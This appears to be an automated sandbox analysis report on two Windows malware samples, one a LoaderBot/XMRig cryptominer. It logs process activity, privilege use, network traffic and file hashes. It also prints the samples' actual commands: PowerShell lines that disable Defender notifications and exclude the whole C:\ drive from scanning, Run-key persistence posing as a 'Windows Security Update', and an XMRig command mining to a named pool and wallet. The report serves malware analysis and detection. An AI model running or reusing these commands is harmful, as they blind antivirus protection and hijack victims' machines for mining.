N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4480 wrote to memory of 4540 N/A C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe
PID 4480 wrote to memory of 4540 N/A C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe
PID 4540 wrote to memory of 4760 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4540 wrote to memory of 4760 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4540 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4540 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4540 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4540 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4540 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4540 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4540 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
PID 4540 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
PID 4540 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
PID 4540 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
PID 4540 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
PID 4540 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
PID 4540 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe

Processes

C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe

"C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Set-MpPreference -PUAProtection 1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Set-ItemProperty -Path 'HKLM:\\SOFTWARE\\Microsoft\\Windows Defender Security Center\\Notifications' -Name DisableNotifications -Value 1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Add-MpPreference -ExclusionPath C:\

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security Update';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security Update' -Value '"C:\Users\Admin\AppData\Local\Temp\Windows Security Update\WinSec.exe"' -PropertyType 'String'

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe --donate-level 0 --max-cpu-usage 50 -o pool.supportxmr.com:3333 -u 4774bMmQt7g8FfWNP1K51Tdy7v5DS2ZRYarJcEmpy8rAXnuycfKGerFdEawGvgHUnCePRxky732gfcowXbXHcwT69rhLT5w.rig16

Network

Country Destination Domain Proto
US 209.197.3.8:80 tcp
FR 2.18.109.224:443 tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 pool.supportxmr.com udp
FR 141.94.96.71:3333 pool.supportxmr.com tcp
US 209.197.3.8:80 tcp
US 209.197.3.8:80 tcp

Files

memory/4540-132-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe

MD5 a419d5d9882f43143818df7122c684a1
SHA1 63a5ae4680d40c7c87d3b5b96317a8afbf42d071
SHA256 594fcf39f956a9e3c7563d0a5ba815ccba997568160008b82065474d62c1a9b7
SHA512 3d6fe541beffebb25c0bc5980a7b279c86d279b0ffbfcf5605535ec97be5b84ea6d7f0b7229fdb129dd6332e215c683e4853cf1306190489ef35f77580fea66a

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe

MD5 a419d5d9882f43143818df7122c684a1
SHA1 63a5ae4680d40c7c87d3b5b96317a8afbf42d071
SHA256 594fcf39f956a9e3c7563d0a5ba815ccba997568160008b82065474d62c1a9b7
SHA512 3d6fe541beffebb25c0bc5980a7b279c86d279b0ffbfcf5605535ec97be5b84ea6d7f0b7229fdb129dd6332e215c683e4853cf1306190489ef35f77580fea66a

memory/4540-135-0x00000195AD3C0000-0x00000195AD96E000-memory.dmp

memory/4540-136-0x00000195ADE60000-0x00000195ADE6A000-memory.dmp

memory/4760-137-0x0000000000000000-mapping.dmp

memory/1492-138-0x0000000000000000-mapping.dmp

memory/4540-140-0x00007FFAB6E30000-0x00007FFAB78F1000-memory.dmp

memory/632-139-0x0000000000000000-mapping.dmp

memory/4760-141-0x00000204EDC60000-0x00000204EDC82000-memory.dmp

memory/4760-142-0x00007FFAB6E30000-0x00007FFAB78F1000-memory.dmp

memory/632-143-0x00007FFAB6E30000-0x00007FFAB78F1000-memory.dmp

memory/1492-144-0x00007FFAB6E30000-0x00007FFAB78F1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

memory/632-148-0x00007FFAB6E30000-0x00007FFAB78F1000-memory.dmp

memory/4760-150-0x00007FFAB6E30000-0x00007FFAB78F1000-memory.dmp

memory/1492-149-0x00007FFAB6E30000-0x00007FFAB78F1000-memory.dmp

memory/1260-151-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

memory/4540-153-0x00000195AF5C0000-0x00000195AF5D2000-memory.dmp

memory/1260-154-0x00007FFAB6E30000-0x00007FFAB78F1000-memory.dmp

memory/2072-155-0x0000000140000000-0x0000000140711000-memory.dmp

memory/2072-156-0x000000014070A480-mapping.dmp

memory/2072-157-0x0000000140000000-0x0000000140711000-memory.dmp

memory/2072-158-0x0000000140000000-0x0000000140711000-memory.dmp

memory/2072-159-0x0000000140000000-0x0000000140711000-memory.dmp

memory/2072-161-0x000002630A7C0000-0x000002630A7D4000-memory.dmp

memory/4540-160-0x00007FFAB6E30000-0x00007FFAB78F1000-memory.dmp

memory/2072-162-0x0000000140000000-0x0000000140711000-memory.dmp

memory/2072-163-0x000002630A900000-0x000002630A940000-memory.dmp

memory/2072-164-0x0000000140000000-0x0000000140711000-memory.dmp

memory/2072-165-0x000002639E540000-0x000002639E560000-memory.dmp

memory/2072-166-0x000002639E540000-0x000002639E560000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2022-09-07 13:02

Reported

2022-09-07 13:06

Platform

win7-20220812-en

Max time kernel

151s

Max time network

46s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe"

Signatures

LoaderBot

loader miner loaderbot

xmrig

miner xmrig

LoaderBot executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe" C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
